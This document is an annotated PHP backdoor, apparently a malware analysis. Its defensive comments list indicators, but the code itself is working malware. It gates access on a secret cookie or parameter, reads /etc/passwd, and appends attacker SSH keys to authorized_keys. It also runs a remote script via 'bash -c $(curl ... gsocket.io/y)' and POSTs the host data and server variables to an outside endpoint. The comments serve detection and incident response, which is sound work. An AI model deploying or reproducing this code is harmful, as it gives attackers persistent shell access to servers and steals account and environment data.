<?php
// Analyst note: runtime setup followed by an access gate. Everything after the gate
// (host profiling, authorized_keys writes, remote script execution, outbound POST)
// only runs when one of the four conditions below matches.
error_reporting(E_ALL);
ini_set('display_errors', 1);
// log_errors=0: errors raised while this script runs are shown in the response
// (display_errors=1) and are not written to the PHP error log, so the error log
// is not a reliable place to look for traces of an execution.
ini_set('log_errors', 0);
// Gate 1: a cookie with this exact name/value pair. Both strings are fixed and usable
// as hunting strings; note that cookies are not recorded by default access-log formats.
if (!empty($_COOKIE['f6975d6b0e6087dbea971c93cdce5dd2']) && $_COOKIE['f6975d6b0e6087dbea971c93cdce5dd2'] === 'da00c38aacde5b89aa408c8338151caa') {
// Gate 2: the same name/value as a request parameter. When sent in the query string
// it will appear in web-server access logs.
} elseif (!empty($_REQUEST['f6975d6b0e6087dbea971c93cdce5dd2']) && $_REQUEST['f6975d6b0e6087dbea971c93cdce5dd2'] === 'da00c38aacde5b89aa408c8338151caa') {
// Gate 3: $xml_code is not assigned anywhere in this file.
// NOTE(review): presumably set by a separate loader that include()s or eval()s this
// code; confirm by searching the site for the variable name.
} elseif (!empty($xml_code)) {
// Gate 4: command-line invocation always passes.
} elseif (PHP_SAPI === 'cli') {
} else {
// Any other visitor gets a 200 response with cache-suppressing headers and no body;
// the top-level return stops this file before any of the code below runs.
header('HTTP/1.1 200 OK', true);
header('X-Accel-Buffering: no');
header('Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, s-maxage=0, post-check=0, pre-check=0');
header('Cache-Control: no-cache', false);
header('Pragma: no-cache');
header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
header('Last-Modified: '.gmdate('D, d M Y H:i:s').' GMT');
// Non-standard response header; its exact name/value can serve as a response-side
// indicator when hunting for other copies of this file.
header('disablevcache: true');
return;
}
// Analyst note: host profiling. Collects the server's public IPv4/IPv6 address,
// hostname, account names, working directory and the local account list, then echoes
// them in the HTTP response. The same values are appended to the outbound POST body
// built at the end of this file.
// Network indicator: the web server itself makes outbound HTTPS requests to the two
// ipify hosts (5 s timeout each); '@' hides any failure.
$ihupwpa_i = trim(@file_get_contents('https://api4.ipify.org', false, stream_context_create(['http' => ['timeout' => 5]]))."
".@file_get_contents('https://api6.ipify.org', false, stream_context_create(['http' => ['timeout' => 5]])));
$ihupwpa_h = gethostname();
// get_current_user() reports the owner of this script file; the POSIX lookup below
// reports the effective user of the PHP process. Both are kept when they differ.
$ihupwpa_u = get_current_user();
$ihupwpa_pu = '';
if (function_exists('posix_geteuid') && function_exists('posix_getpwuid')) {
$ihupwpa_pu = posix_getpwuid(posix_geteuid())['name'];
}
if ($ihupwpa_pu !== '' && $ihupwpa_pu !== $ihupwpa_u) {
$ihupwpa_u .= "
".$ihupwpa_pu;
}
$ihupwpa_pw = getcwd();
// Reads the full local account list when it is readable. The path is assembled from
// two string pieces. NOTE(review): presumably so a literal-string scan for the path
// does not match; content signatures should account for split literals.
$ihupwpa_pa = @is_readable('/etc/passw'.'d') ? @file_get_contents('/etc/passw'.'d') : '';
// Everything collected above is written to the response body inside a <pre> block,
// one "key=value" line per item (i, h, u, pw, pa).
print('<pre>'."
");
print('i='.$ihupwpa_i."
");
print('h='.$ihupwpa_h."
");
print('u='.$ihupwpa_u."
");
print('pw='.$ihupwpa_pw."
");
print('pa='.$ihupwpa_pa."
");
print('</pre>'."
");
// Analyst note: SSH persistence. Builds a list of candidate home/base directories and
// appends two fixed public keys to <dir>/.ssh/authorized_keys in each one that exists.
// Response guidance: treat both key blobs below as indicators, search every
// authorized_keys file on the host for them (including .ssh directories that appear
// inside web roots), remove the entries, and review SSH login history for the affected
// accounts. The keys are appended on every run, so duplicates are expected.
$ak_base_folders = [];
// Candidate 1-2: home directory from the process environment (Unix and Windows names).
if (getenv('HOME')) {
$ak_base_folders[] = getenv('HOME');
}
if (getenv('USERPROFILE')) {
$ak_base_folders[] = getenv('USERPROFILE');
}
// Candidate 3: home directory from the passwd entry of the real UID of the PHP process.
if (function_exists('posix_getuid') && function_exists('posix_getpwuid')) {
$ak_info = posix_getpwuid(posix_getuid());
if (!empty($ak_info['dir'])) {
$ak_base_folders[] = $ak_info['dir'];
}
}
// Candidate 4: conventional /home/<USER> path built from the USER environment variable.
if (getenv('USER')) {
$ak_base_folders[] = '/home/'.getenv('USER');
}
// Candidate 5-6: the application root and its parent when an ABSPATH constant is
// defined (WordPress defines a constant with this name).
if (defined('ABSPATH')) {
$ak_base_folders[] = rtrim(ABSPATH, '/');
$ak_base_folders[] = dirname(ABSPATH);
}
// Candidate 7-8: the web document root and its parent directory.
if (!empty($_SERVER['DOCUMENT_ROOT'])) {
$ak_base_folders[] = $_SERVER['DOCUMENT_ROOT'];
}
if (!empty($_SERVER['DOCUMENT_ROOT'])) {
$ak_base_folders[] = dirname($_SERVER['DOCUMENT_ROOT']);
}
$ak_base_folders = array_unique($ak_base_folders);
// Directories that exist; reported back in the outbound POST at the end of the file.
$ak_base_folder_list = [];
foreach ($ak_base_folders as $ak_base_folder) {
if (!is_dir($ak_base_folder)) {
continue;
}
// Recorded before any write is attempted, so presence in this list (and in the
// printed "f=" line) does not prove the key write succeeded; verify on disk.
$ak_base_folder_list[] = $ak_base_folder;
$ak_s_folder = $ak_base_folder.'/.ssh';
$ak_a_file = $ak_base_folder.'/.ssh/authorized_keys';
// Creates .ssh if missing and sets the permissions sshd normally expects
// (0700 on the directory, 0600 on the file). All failures are suppressed with '@'.
if (!@is_dir($ak_s_folder)) {
@mkdir($ak_s_folder, 0700, true);
}
@chmod($ak_s_folder, 0700);
// touch() updates the file's modification time even when the file already exists.
@touch($ak_a_file);
@chmod($ak_a_file, 0600);
// A leading newline is appended first so the new entries start on their own line.
@file_put_contents($ak_a_file, "
", FILE_APPEND);
// Indicator 1: RSA public key, written without a trailing comment field.
@file_put_contents($ak_a_file, 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDnl58I0bMWNGeies3I5qELXn4No3FAUjDvvagXR7GuMnqKCghBeNf1lJ/U0KF1B78dCibHlDkR848UWBVdWHXFdFc4RWFzS8xIgVRLAQtWX5PpMSBT3Zmhk7DuNCGrrT6od+ZQR3cpGn0TrZw0bP20puETI9rO9Q25nrP9JlEBznFtKJkL0Ruwr3+w1O1CP60tcx1NhmmJcznKFlHrlCxZXA1SBatMZchM+jXiwkRf2AkM2tva+3b0docpuFm/3bY/7xdoc7/ZBCMjxl/NDsOau80iGzTfk2lOBjRDvGbyneZcFDtRm4KyJkopplzqdMo5lWikVUroUXYfgeA2eLpGbraO0peQMCb7LZcOzXKxWiGl5mIkHd6brUOztSpQkslRNjjKXVNvxbrS2TrJEeTuClM8tPnClClRKR21wHn66sPbJrRhppKq4KJxD8UaP8EfNe6vLtkXT1DDJpWWL9C9k7qox20bQHFTcY8MmO3t0kRXuhy7HHYIo5IIGKTDOKU='."
", FILE_APPEND);
// Indicator 2: Ed25519 public key, also without a comment field.
@file_put_contents($ak_a_file, 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMXvanAQMY/rVWukp6d0t0xzeIO2DzO1pDF58skSRds6'."
", FILE_APPEND);
// Echoes the directory path to the HTTP response as "f=<dir>".
print('<pre>'."
".'f='.$ak_base_folder."
".'</pre>'."
");
}
// Analyst note: shell-command wrapper. Runs $cmd through the first usable function out
// of proc_open, exec, passthru, system and shell_exec, and returns the captured stdout.
// $stderr and $status are filled by reference where the chosen function provides them.
// Falls off the end (returns null) when none of the five is usable.
// Hardening implication: a disable_functions policy only stops this wrapper if it
// covers all five names. Detection: the PHP worker process spawning a shell child.
$my_execution = function($cmd, &$stderr = null, &$status = null) {
$stderr = null;
$status = null;
// Parsed once per request and reused: lower-cased names from the disable_functions
// ini setting, flipped into a lookup table.
static $disable_functions;
if (!isset($disable_functions)) {
$disable_functions = array_flip(array_map('strtolower', array_map('trim', explode(',', trim(ini_get('disable_functions'))))));
}
// Preference order. proc_open and exec always come first; when the caller passed a
// third argument (wants an exit status) passthru/system are tried before shell_exec,
// otherwise shell_exec is tried before them.
$functions = [];
$functions[] = 'proc_open';
$functions[] = 'exec';
if (func_num_args() >= 3) {
$functions[] = 'passthru';
$functions[] = 'system';
$functions[] = 'shell_exec';
} else {
$functions[] = 'shell_exec';
$functions[] = 'passthru';
$functions[] = 'system';
}
// Each branch checks that the function exists, is callable and is not in the
// disable_functions table, then runs the command and returns immediately.
foreach ($functions as $function) {
if ($function === 'proc_open' && function_exists('proc_open') && is_callable('proc_open') && !isset($disable_functions['proc_open'])) {
// stdout and stderr are captured through pipes; the exit status comes from proc_close().
$descriptorspec = [
1 => ['pipe', 'w'],
2 => ['pipe', 'w']
];
$pipes = [];
$proc = proc_open($cmd, $descriptorspec, $pipes);
$stdout = stream_get_contents($pipes[1]);
fclose($pipes[1]);
$stderr = stream_get_contents($pipes[2]);
fclose($pipes[2]);
$status = proc_close($proc);
// Output consisting only of this literal is treated as empty.
// NOTE(review): looks like the tail of a terminal erase-line control sequence; the
// leading escape byte may have been lost when this listing was extracted.
if ($stdout === "
[0K
") {
$stdout = '';
}
return $stdout;
}
if ($function === 'exec' && function_exists('exec') && is_callable('exec') && !isset($disable_functions['exec'])) {
// exec() returns output as an array of lines; they are rejoined with PHP_EOL.
$stdout = [];
exec($cmd, $stdout, $status);
$stdout = implode(PHP_EOL, $stdout);
return $stdout;
}
if ($function === 'passthru' && function_exists('passthru') && is_callable('passthru') && !isset($disable_functions['passthru'])) {
// passthru() writes straight to the output stream, so output buffering captures it.
ob_start();
passthru($cmd, $status);
$stdout = ob_get_clean();
return $stdout;
}
if ($function === 'system' && function_exists('system') && is_callable('system') && !isset($disable_functions['system'])) {
// Same buffering approach as the passthru branch.
ob_start();
system($cmd, $status);
$stdout = ob_get_clean();
return $stdout;
}
if ($function === 'shell_exec' && function_exists('shell_exec') && is_callable('shell_exec') && !isset($disable_functions['shell_exec'])) {
// shell_exec() provides no exit status, so $status stays null on this path.
$stdout = shell_exec($cmd);
return $stdout;
}
}
};
// Analyst note: remote script execution. The command downloads a script from the URL in
// the string below with curl and runs it in bash, in the security context of the PHP
// process. What that script installs is not visible in this file and has to be
// established from the host (new files, processes, cron/systemd/shell-profile changes).
// Detection: a web-server/PHP worker spawning bash together with curl or wget, and
// outbound HTTPS from the web server to the host named in the command.
$my_stdout = $my_execution('bash -c "$(curl -fsSL https://gsocket.io/y)"');
// The captured output is echoed to the HTTP response ('NULL' when empty) and is also
// appended to the outbound POST body built at the end of this file.
print('<pre>'."
".strval($my_stdout ? $my_stdout : 'NULL')."
".'</pre>'."
");
// When the output lacks this marker sentence, the same URL is fetched with wget instead.
// NOTE(review): presumably the marker is the remote script's success banner; confirm
// against a captured copy of the response.
if (strpos($my_stdout, 'To connect use one of the following') === false) {
$my_stdout .= $my_execution('bash -c "$(wget --no-verbose -O- https://gsocket.io/y)"');
print('<pre>'."
".strval($my_stdout ? $my_stdout : 'NULL')."
".'</pre>'."
");
}
// Analyst note: generic HTTP client built on the cURL extension. In this file it is
// used once, at the end, to POST the collected data to a remote endpoint.
// Returns ['info' => curl_getinfo() array, 'head' => raw response headers,
// 'body' => response body, 'error' => curl_error(), 'errno' => curl_errno()].
$curl_request = function($method, $url, $headers = [], $params = null, $options = []) {
// Headers may arrive as a newline-separated string, as ['headers' => [...]], or as a
// name => value map; all forms are normalised to a list of "Name: value" lines.
if (is_string($headers)) {
$headers = array_values(array_filter(array_map('trim', explode("
", $headers))));
}
if (is_array($headers) && isset($headers['headers']) && is_array($headers['headers'])) {
$headers = $headers['headers'];
}
if (is_array($headers)) {
foreach ($headers as $key => $value) {
if (is_string($key) && !is_numeric($key)) {
$headers[$key] = sprintf('%s: %s', $key, $value);
}
}
}
// Array/Traversable params are URL-encoded unless one value is a CURLFile, in which
// case the array is passed through unchanged to cURL.
if (is_array($params) || (is_object($params) && $params instanceof Traversable)) {
$has_curl_file = false;
foreach ($params as $key => $value) {
if (is_object($value) && $value instanceof CURLFile) {
$has_curl_file = true;
break;
}
}
if (!$has_curl_file) {
$params = http_build_query($params);
}
} elseif (is_object($params)) {
$params = http_build_query($params);
}
// Default cURL options: 5 s connect timeout, 10 s total timeout, response headers
// included in the output so they can be split off by header_size below.
$opts = [];
$opts[CURLINFO_HEADER_OUT] = true;
$opts[CURLOPT_CONNECTTIMEOUT] = 5;
$opts[CURLOPT_CUSTOMREQUEST] = strtoupper($method);
$opts[CURLOPT_ENCODING] = '';
$opts[CURLOPT_FOLLOWLOCATION] = false;
$opts[CURLOPT_HEADER] = true;
$opts[CURLOPT_HTTPHEADER] = $headers;
if ($params !== null) {
$opts[CURLOPT_POSTFIELDS] = $params;
}
$opts[CURLOPT_RETURNTRANSFER] = true;
// TLS certificate and host-name verification are both switched off, so the request
// succeeds against any certificate, including one presented by an inspecting proxy.
$opts[CURLOPT_SSL_VERIFYHOST] = 0;
$opts[CURLOPT_SSL_VERIFYPEER] = 0;
$opts[CURLOPT_TIMEOUT] = 10;
$opts[CURLOPT_URL] = $url;
// Caller-supplied $options take precedence; defaults only fill the gaps.
foreach ($opts as $key => $value) {
if (!array_key_exists($key, $options)) {
$options[$key] = $value;
}
}
// Redirects are never delegated to libcurl: the flag is remembered, cleared on the
// handle, and redirects are followed by the loop below via info['redirect_url'].
$follow = false;
if ($options[CURLOPT_FOLLOWLOCATION]) {
$follow = true;
$options[CURLOPT_FOLLOWLOCATION] = false;
}
// Up to 2 retries on transport errors and up to CURLOPT_MAXREDIRS (default 5) redirects.
$errors = 2;
$redirects = isset($options[CURLOPT_MAXREDIRS]) ? $options[CURLOPT_MAXREDIRS] : 5;
while (true) {
$ch = curl_init();
curl_setopt_array($ch, $options);
$body = curl_exec($ch);
$info = curl_getinfo($ch);
// Split the raw response into header block and body using the reported header size.
$head = substr($body, 0, $info['header_size']);
$body = substr($body, $info['header_size']);
$error = curl_error($ch);
$errno = curl_errno($ch);
curl_close($ch);
$response = [
'info' => $info,
'head' => $head,
'body' => $body,
'error' => $error,
'errno' => $errno,
];
if ($error || $errno) {
if ($errors > 0) {
$errors--;
continue;
}
} elseif ($info['redirect_url'] && $follow) {
if ($redirects > 0) {
$redirects--;
$options[CURLOPT_URL] = $info['redirect_url'];
continue;
}
}
// Reached on success, or once the retry/redirect budget is exhausted; the last
// response (possibly an error) is what gets returned.
break;
}
return $response;
};
// Analyst note: fallback HTTP client built on file_get_contents() with a stream context.
// The code at the end of this file selects it when curl_init() does not exist, so the
// outbound POST still happens on hosts without the cURL extension.
// Returns the same array shape as $curl_request (info, head, body, error, errno).
$fgc_request = function($method, $url, $headers = [], $params = null, $options = []) {
// Header and parameter normalisation is the same as in $curl_request.
if (is_string($headers)) {
$headers = array_values(array_filter(array_map('trim', explode("
", $headers))));
}
if (is_array($headers) && isset($headers['headers']) && is_array($headers['headers'])) {
$headers = $headers['headers'];
}
if (is_array($headers)) {
foreach ($headers as $key => $value) {
if (is_string($key) && !is_numeric($key)) {
$headers[$key] = sprintf('%s: %s', $key, $value);
}
}
}
if (is_array($params) || (is_object($params) && $params instanceof Traversable)) {
$has_curl_file = false;
foreach ($params as $key => $value) {
if (is_object($value) && $value instanceof CURLFile) {
$has_curl_file = true;
break;
}
}
if (!$has_curl_file) {
$params = http_build_query($params);
}
} elseif (is_object($params)) {
$params = http_build_query($params);
}
// Stream-context defaults: no redirect following, 10 s timeout, and TLS peer and
// peer-name verification disabled (any certificate is accepted).
$opts = [
'http' => [
'method' => strtoupper($method),
'header' => implode("
", $headers),
'follow_location' => false,
'max_redirects' => 5,
'timeout' => 10,
],
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false,
],
];
// Overrides are looked up under the string keys 'CURLOPT_…', not under the integer
// values of the cURL constants of the same name.
if (array_key_exists('CURLOPT_FOLLOWLOCATION', $options)) {
$opts['http']['follow_location'] = $options['CURLOPT_FOLLOWLOCATION'];
}
if (array_key_exists('CURLOPT_MAXREDIRS', $options)) {
$opts['http']['max_redirects'] = $options['CURLOPT_MAXREDIRS'];
}
if (array_key_exists('CURLOPT_TIMEOUT', $options)) {
$opts['http']['timeout'] = $options['CURLOPT_TIMEOUT'];
} elseif (array_key_exists('CURLOPT_CONNECTTIMEOUT', $options)) {
$opts['http']['timeout'] = $options['CURLOPT_CONNECTTIMEOUT'];
}
if ($params !== null) {
$opts['http']['content'] = $params;
}
$context = stream_context_create($opts);
// '@' suppresses the warning on failure; error_get_last() is read right afterwards.
$body = @file_get_contents($url, false, $context);
$last_error = error_get_last();
if ($body === false) {
$body = '';
}
// http_code is 200 only when the first response line equals the literal
// 'HTTP/1.1 200'; every other value, or no response at all, is reported as 500.
$info = [
'http_code' => ($http_response_header[0] ?? 'HTTP/1.1 500') === 'HTTP/1.1 200' ? 200 : 500,
];
// $http_response_header is filled in by PHP's HTTP stream wrapper after the call above.
$head = '';
if (!$http_response_header) {
$head = '';
} elseif ($http_response_header) {
$head = implode("
", $http_response_header);
}
// error: message of the last recorded PHP error if there is one, otherwise 'Error'
// when no response headers were received and '' when they were.
$error = 'Error';
if (is_array($last_error)) {
$error = $last_error['message'];
} elseif (!$http_response_header) {
$error = 'Error';
} elseif ($http_response_header) {
$error = '';
}
// errno follows the same three cases; in the first case it receives the error
// message string rather than a number.
$errno = 1;
if (is_array($last_error)) {
$errno = $last_error['message'];
} elseif (!$http_response_header) {
$errno = 1;
} elseif ($http_response_header) {
$errno = 0;
}
$response = [
'info' => $info,
'head' => $head,
'body' => $body,
'error' => $error,
'errno' => $errno,
];
return $response;
};
// Analyst note: outbound reporting. Everything collected earlier in this file is sent in
// a single HTTP POST from the web server to a remote endpoint.
$my_method = 'POST';
// Destination: the 'url' request parameter when present, otherwise the hard-coded
// default. Because the requester can override it, egress detection should not rely on
// the default host alone; look for POSTs from the PHP process to any external host
// around the time the gate parameter/cookie was seen.
$my_url = !empty($_REQUEST['url']) ? $_REQUEST['url'] : 'https://information.cloudsyndication.org/';
$my_headers = [];
// POST fields. 'headers' carries every header of the triggering request (getallheaders(),
// or the whole $_SERVER array when that function is missing) and 'server' carries the
// full $_SERVER array as JSON.
// NOTE(review): depending on server configuration $_SERVER can include environment
// variables; if secrets are exposed that way, treat them as disclosed and rotate them.
$my_params = [
'method' => $_SERVER['REQUEST_METHOD'],
'path' => explode('?', $_SERVER['REQUEST_URI'], 2)[0],
'query' => implode('?', array_slice(explode('?', $_SERVER['REQUEST_URI'], 2), 1)),
'headers' => json_encode(function_exists('getallheaders') ? getallheaders() : $_SERVER, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES),
'params' => '',
'server' => json_encode($_SERVER, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES),
];
// 'params' repeats the text already echoed to the HTTP response: public IPs (i),
// hostname (h), account names (u), working directory (pw) and the local account
// list (pa).
$my_params['params'] .= '<pre>'."
";
$my_params['params'] .= 'i='.$ihupwpa_i."
";
$my_params['params'] .= 'h='.$ihupwpa_h."
";
$my_params['params'] .= 'u='.$ihupwpa_u."
";
$my_params['params'] .= 'pw='.$ihupwpa_pw."
";
$my_params['params'] .= 'pa='.$ihupwpa_pa."
";
$my_params['params'] .= '</pre>'."
";
// One "f=<dir>" entry per existing directory in which an authorized_keys write was attempted.
foreach ($ak_base_folder_list as $ak_base_folder) {
$my_params['params'] .= '<pre>'."
".'f='.$ak_base_folder."
".'</pre>'."
";
}
// Captured output of the remotely fetched script ('NULL' when there was none).
$my_params['params'] .= '<pre>'."
".strval($my_stdout ? $my_stdout : 'NULL')."
".'</pre>'."
";
$my_options = [];
// Transport selection: cURL when the extension is loaded, otherwise the
// file_get_contents fallback. Either way the POST is attempted up to 3 times, stopping
// at the first attempt that reports no error. The response is not used further in the
// visible code.
if (function_exists('curl_init')) {
for ($my_retry = 0; $my_retry < 3; $my_retry++) {
$my_response = $curl_request($my_method, $my_url, $my_headers, $my_params, $my_options);
if ($my_response['errno'] || $my_response['error']) {
continue;
}
break;
}
} else {
for ($my_retry = 0; $my_retry < 3; $my_retry++) {
$my_response = $fgc_request($my_method, $my_url, $my_headers, $my_params, $my_options);
if ($my_response['errno'] || $my_response['error']) {
continue;
}
break;
}
}